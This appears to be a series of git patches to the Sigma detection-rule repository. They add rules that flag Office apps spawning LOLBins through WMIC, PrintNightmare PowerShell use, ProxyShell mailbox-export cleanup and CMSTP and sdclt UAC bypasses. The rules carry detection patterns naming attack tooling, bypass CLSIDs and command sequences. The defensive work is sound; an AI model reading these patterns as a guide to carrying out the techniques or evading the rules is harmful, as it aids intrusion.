+modified: 2021/08/30 logsource: product: windows service: powershell definition: Script block logging must be enabled detection: selection: + EventID: 4104 ScriptBlockText|contains: - "WMImplant" - " change_user " diff --git a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml b/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml index 7b26a54e..d3b87330 100644 --- a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml +++ b/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml @@ -3,7 +3,7 @@ id: df9a0e0e-fedb-4d6c-8668-d765dfc92aa7 description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. status: experimental date: 2020/06/24 -modified: 2021/05/21 +modified: 2021/08/30 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -16,12 +16,13 @@ references: - https://github.com/bohops/WSMan-WinRM logsource: product: windows - service: powershell + service: powershell-classic + definition: fields have to be extract from event detection: selection: - - 'ProviderName=WSMan' + ProviderName: WSMan filter: - - 'HostApplication=*powershell' + HostApplication|contains: powershell condition: selection and not filter falsepositives: - Unknown From b36db223b1e1ea27e8ff10ad5b7b71e1a78a44af Mon Sep 17 00:00:00 2001 From: zazzzSec Date: Mon, 30 Aug 2021 21:06:57 -0400 Subject: [PATCH 0632/1367] fixing path wildcards that don't adhear to tool specifications --- tools/sigma/backends/carbonblack.py | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/tools/sigma/backends/carbonblack.py b/tools/sigma/backends/carbonblack.py index cf517577..e85d2346 100644 --- a/tools/sigma/backends/carbonblack.py +++ b/tools/sigma/backends/carbonblack.py @@ -116,6 +116,14 @@ class CarbonBlackQueryBackend(CarbonBlackWildcardHandlingMixin, SingleTextQueryB strUnescapeMatch = self.unescapeCharacter(strMatch) val = val.replace(strMatch, '"{}"'.format(strUnescapeMatch)) return val.strip() + + def fixWildcards(self, val): + # prob a better way to do this with SigmaStartswithModifier/SigmaEndswithModifier? idk, fail fast! + if val.endswith("\\\\"): + val = val[:-1] + "*" + if val.startswith("\\\\") and not val.startswith("\\\\\\\\"): + val = val[2:] + return val def cleanValue(self, val): if "[1 to *]" in val: @@ -129,6 +137,7 @@ class CarbonBlackQueryBackend(CarbonBlackWildcardHandlingMixin, SingleTextQueryB val = self.cleanLeading(val) val = self.escapeCharacter(val) val = self.cleanWhitespace(val) + val = self.fixWildcards(val) return val def cleanIPRange(self, value): From 5508ff45b671ccedccebfdaff84197879eedf0f9 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Mon, 30 Aug 2021 21:47:36 -0600 Subject: [PATCH 0633/1367] Add files via upload --- ...ocess_Creations_by_Office_applications.yml | 39 +++++++++++++++ ...creations_with_Wmiprvse_parent_process.yml | 37 +++++++++++++++ ..._proxy executing_regsvr32_with_payload.yml | 47 +++++++++++++++++++ ...Applications_Spawning_WMI_command-line.yml | 36 ++++++++++++++ 4 files changed, 159 insertions(+) create mode 100644 rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml create mode 100644 rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml create mode 100644 rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml create mode 100644 rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml new file mode 100644 index 00000000..6b77a997 --- /dev/null +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -0,0 +1,39 @@ +title: Monitor LOLBins Process Creations by Office applications (Security Event Logs) +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + NewProcessName|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentProcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml new file mode 100644 index 00000000..90d5557e --- /dev/null +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -0,0 +1,37 @@ +title: LOLBins process creations with Wmiprvse parent process. (Security Event Logs) +description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + NewProcessName|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentProcessName|endswith: + - "\\wbem\\WmiPrvSE.exe" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml new file mode 100644 index 00000000..b54db391 --- /dev/null +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -0,0 +1,47 @@ +title: Monitor Excel from proxy executing regsvr32 with payload (Security Event Logs) +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + ProcessCommandLine: + - '*regsvr32*' + - '*rundll32*' + - '*msiexec*' + - '*mshta*' + - '*verclsid*' + selection3: + - ProcessName: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + selection4: + ParentProcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + selection5: + processCommandLine|contains|all: + - 'process' + - 'create' + - 'call' + condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml new file mode 100644 index 00000000..df25ef11 --- /dev/null +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -0,0 +1,36 @@ +title: Office Applications Spawning WMI command-line (Security Event Logs) +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: windows + service: security + category: process_creation +detection: + description: Add more office applications to the rule logic of choice + selection1: + - EventLog: security + selection2: + - EventID: 4688 + selection3: + - ProcessName: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + selection4: + - ParentProcessName: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 AND selection4 +falsepositives: +- "" +level: high \ No newline at end of file From 6c9b2a2f374b44d0f011b53fdd824b68bb1fd925 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Mon, 30 Aug 2021 21:48:03 -0600 Subject: [PATCH 0634/1367] Add files via upload --- ...ocess_Creations_by_Office_applications.yml | 39 +++++++++++++++ ...creations_with_Wmiprvse_parent_process.yml | 37 ++++++++++++++ ..._proxy_executing_regsvr32_with_payload.yml | 49 +++++++++++++++++++ ...ice_applications_using_file_extentions.yml | 44 +++++++++++++++++ ...Applications_Spawning_WMI_command-line.yml | 37 ++++++++++++++ 5 files changed, 206 insertions(+) create mode 100644 rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml create mode 100644 rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml create mode 100644 rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml create mode 100644 rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml create mode 100644 rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml new file mode 100644 index 00000000..db13196c --- /dev/null +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -0,0 +1,39 @@ +title: Monitor LOLBins Process Creations by Office applications (Security Event Logs) +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 1 + selection2: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml new file mode 100644 index 00000000..3acabbea --- /dev/null +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -0,0 +1,37 @@ +title: LOLBins process creations with Wmiprvse parent process(sysmon) +description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 1 + selection2: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentImage|endswith: + - "\\wbem\\WmiPrvSE.exe" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "FPs are possible here, but some LOLBins weren't excluded for obvious reasons." +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml new file mode 100644 index 00000000..71e30907 --- /dev/null +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -0,0 +1,49 @@ +title: Monitor Excel from proxy executing regsvr32 with payload (Sysmon) +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 1 + selection2: + - Image: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + - OriginalFileName: 'wmic.exe' + - Description: 'WMI Commandline Utility' + selection3: + CommandLine|contains: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection4: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + selection5: + processCommandLine|contains|all: + - 'process' + - 'create' + - 'call' + condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml new file mode 100644 index 00000000..61716031 --- /dev/null +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -0,0 +1,44 @@ +title: monitor executable and script files creation by Office applications, using file extentions (Sysmon). +description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: Please add more file extentions to the logic of your choice. + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 11 + selection2: + Image|endswith: + - 'winword.exe' + - 'excel.exe' + - 'powerpnt.exe' + selection3: + TargetFileName|endswith: + - ".exe" + - ".dll" + - ".ocx" + - ".com" + - ".ps1" + - ".vbs" + - ".sys" + - ".bat" + - ".scr" + - ".proj" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml new file mode 100644 index 00000000..fbeedaad --- /dev/null +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -0,0 +1,37 @@ +title: Office Applications Spawning WMI command-line (sysmon) +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: windows + service: sysmon + category: process_creation +detection: + description: Add more office applications to the rule logic of choice + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 1 + selection2: + - Image: '\wbem\WMIC.exe' + - CommandLine: '*wmic *' + - OriginalFileName: 'wmic.exe' + - Description: 'WMI Commandline Utility' + selection3: + - ParentPrcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file From e913032865373599f07633f696220263b6c7affc Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Mon, 30 Aug 2021 21:50:16 -0600 Subject: [PATCH 0635/1367] Add files via upload --- ...mmand_execution_by_Office_Applications.yml | 32 ++++++++++++ ...ice_applications_using_file_extentions.yml | 49 +++++++++++++++++++ 2 files changed, 81 insertions(+) create mode 100644 rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml create mode 100644 rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml new file mode 100644 index 00000000..565467ed --- /dev/null +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -0,0 +1,32 @@ +title: Monitor WMI "Win32_Process::Create" command execution by Office Applications. +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: EndPoint Detection Logs + category: process_creation +detection: + description: Add more office applications to the rule logic of choice + selection1: + EventLog: EDR + EventType: WMIExecution + WMIcommand: '*Win32_Process\:\:Create*' + selection2: + - Image: + - '*\winword.exe' + - '*\excel.exe' + - '*\powerpnt.exe' + condition: selection1 AND selection2 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml new file mode 100644 index 00000000..c4293b6a --- /dev/null +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -0,0 +1,49 @@ +title: monitor executable and script files creation by Office applications, using file extensions and Magic Bytes (EDR). +description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: Please add more file extentions and magic bytes to the logic of your choice. + selection1: + EventType: + - FileCreate + - FileRename + EventID: 11 + selection2: + Image|endswith: + - 'winword.exe' + - 'excel.exe' + - 'powerpnt.exe' + selection3: + FileName|endswith: + - ".exe" + - ".dll" + - ".ocx" + - ".com" + - ".ps1" + - ".vbs" + - ".sys" + - ".bat" + - ".scr" + - ".proj" + selection4: + FileMagicBytes|startswith: + - "4D5A" + condition: selection1 AND selection2 AND (selection3 OR selection4) +falsepositives: +- "" +level: high \ No newline at end of file From e2bfaea10fcb318a1b7e236e41b6bd5d9c9dab22 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Tue, 31 Aug 2021 11:35:54 +0545 Subject: [PATCH 0636/1367] Added new malwarebytes reference for Cab File Expansion rule --- rules/windows/process_creation/sysmon_expand_cabinet_files.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml index 8b9f3f8b..ca64083b 100644 --- a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml +++ b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml @@ -3,9 +3,11 @@ status: experimental id: 9f107a84-532c-41af-b005-8d12a607639f author: Bhabesh Raj date: 2021/07/30 +modified: 2021/08/31 description: Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack references: - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll + - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ tags: - attack.execution - attack.t1218 From 89e21c69ef78f9e152537a333555387be36295be Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 31 Aug 2021 09:07:54 +0200 Subject: [PATCH 0637/1367] fix detection --- rules/windows/powershell/powershell_invoke_nightmare.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml index 64e93f5a..a98b9bba 100644 --- a/rules/windows/powershell/powershell_invoke_nightmare.yml +++ b/rules/windows/powershell/powershell_invoke_nightmare.yml @@ -1,8 +1,9 @@ title: PrintNightmare Powershell Exploitation id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf -status: experimental +status: test description: Detects Commandlet name for PrintNightmare exploitation. date: 2021/08/09 +modified: 2021/08/31 references: - https://github.com/calebstewart/CVE-2021-1675 author: Max Altgelt, Tobias Michalski @@ -13,7 +14,7 @@ logsource: detection: selection: EventID: 4104 - ScriptBlockText: Invoke-Nightmare + ScriptBlockText|contains: Invoke-Nightmare condition: selection falsepositives: - Unknown From 911c45201a8082a6c08fd6004bf351db723c16f9 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Tue, 31 Aug 2021 13:02:53 +0545 Subject: [PATCH 0638/1367] Added -F option support --- rules/windows/process_creation/sysmon_expand_cabinet_files.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml index ca64083b..b05acd63 100644 --- a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml +++ b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml @@ -21,6 +21,7 @@ detection: CommandLine|contains: - '.cab' - '/F:' + - '-F:' - 'C:\ProgramData\' #Suspicious paths to curb FPs if any - 'C:\Public\' - '\AppData\Local\Temp\' From abf40ecfbc1155de368083988918a7fb8c7814fe Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 12:50:11 +0200 Subject: [PATCH 0639/1367] fix: typo in URL --- tests/test_rules.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 730c2ed0..ce92d132 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -573,7 +573,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with non-conform 'title' fields. Please check: https://github.com/SimaHQ/sigma/wiki/Rule-Creation-Guide#title") + "There are rules with non-conform 'title' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title") def test_invalid_logsource_attributes(self): faulty_rules = [] From 3155f7172db676163f665ccf01f5cea762b9ebe4 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 12:51:16 +0200 Subject: [PATCH 0640/1367] detection for proxyshell MSF module --- ...hange_proxyshell_remove_mailbox_export.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/other/win_exchange_proxyshell_remove_mailbox_export.yml diff --git a/rules/windows/other/win_exchange_proxyshell_remove_mailbox_export.yml b/rules/windows/other/win_exchange_proxyshell_remove_mailbox_export.yml new file mode 100644 index 00000000..d9c8fcfe --- /dev/null +++ b/rules/windows/other/win_exchange_proxyshell_remove_mailbox_export.yml @@ -0,0 +1,23 @@ +title: Remove Exported Mailbox from Exchange Webserver +id: 09570ae5-889e-43ea-aac0-0e1221fb3d95 +status: experimental +description: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit +references: + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430 +author: Christian Burkard +date: 2021/08/27 +logsource: + service: msexchange-management + product: windows +detection: + command: + - 'Remove-MailboxExportRequest' + - ' -Identity ' + - ' -Confirm "False"' + condition: all of command +falsepositives: + - unknown +level: high +tags: + - attack.defense_evasion + - attack.t1070 From 50b8ca51109cd26de16de684319de063e571c40a Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 12:20:39 +0200 Subject: [PATCH 0641/1367] add more COM interfaces and sharpen rule logic --- .../win_cmstp_com_object_access.yml | 25 +++++++++++-------- 1 file changed, 15 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/win_cmstp_com_object_access.yml b/rules/windows/process_creation/win_cmstp_com_object_access.yml index 877d398a..f0dc77b3 100644 --- a/rules/windows/process_creation/win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/win_cmstp_com_object_access.yml @@ -1,7 +1,7 @@ title: CMSTP UAC Bypass via COM Object Access id: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253 status: stable -description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects +description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) tags: - attack.execution - attack.defense_evasion @@ -12,23 +12,28 @@ tags: - attack.t1191 # an old one - attack.g0069 - car.2019-04-001 -author: Nik Seetharaman +author: Nik Seetharaman, Christian Burkard modified: 2019/07/31 -date: 2019/01/16 +date: 2021/08/31 references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ - https://twitter.com/hFireF0X/status/897640081053364225 + - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf + - https://github.com/hfiref0x/UACME logsource: category: process_creation product: windows detection: - selection1: - ParentCommandLine|contains: '\DllHost.exe ' - selection2: - ParentCommandLine|endswith: - - '{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - - '{3E000D72-A845-4CD9-BD83-80C07C3B881F}' - condition: selection1 and selection2 + selection: + ParentImage|endswith: '\DllHost.exe' + IntegrityLevel: 'High' + ParentCommandLine|contains: + - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' + - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' + - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' + - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' + - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' + condition: selection fields: - CommandLine - ParentCommandLine From ea77d9161ece00e6f9e4fcb316332dd8023c6f6a Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 12:30:03 +0200 Subject: [PATCH 0642/1367] add another possible sdclt uac bypass registry path --- .../registry_event/sysmon_uac_bypass_sdclt.yml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml b/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml index 5a91724f..f05853b8 100755 --- a/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml @@ -1,21 +1,25 @@ title: UAC Bypass via Sdclt id: 5b872a46-3b90-45c1-8419-f675db8053aa status: experimental -description: Detects changes to HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand +description: Detects the pattern of UAC Bypass using registry key manipulation 